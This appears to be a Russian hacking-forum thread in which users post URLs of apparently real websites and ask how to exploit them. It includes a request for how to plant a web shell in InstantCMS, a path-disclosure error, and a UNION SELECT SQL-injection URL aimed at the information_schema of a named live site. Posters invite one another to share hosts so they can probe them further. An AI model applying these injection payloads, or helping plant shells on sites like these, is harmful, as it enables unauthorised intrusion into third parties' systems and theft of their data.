ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto


возможно что нибудь сделать?
это хотяб бы баг?

Очень понятно.С помощтю спиритического анализа,и работе с духами могу сказать одно: для подтверждения ваших догадок,необходимо отпубликовать в теме исходный url.тоесть - оригинальный адрес сайта.

www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto

оригинал

Эм
Это никак не уязвимость,просто движок тебе сообщает о вещах насущных.

кто нибудь знает как залить шел в Instantcms, доступ в админку есть.

есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???

Ты уже поимел из нее все что можно,а именно - раскрытие пути.
Выложи ссылочку на хост,посмотрим что еще там можно "поиметь".

www.prima-group.kz

http://www.prima-group.kz/index.php?lang=en+from+menu%20where%20id=-1+union+select+TABLE_NAME,TABLE_NAME%20from%20info rmation_schema.tables+--+
SQL-inj+inc.Раскрутить не смог.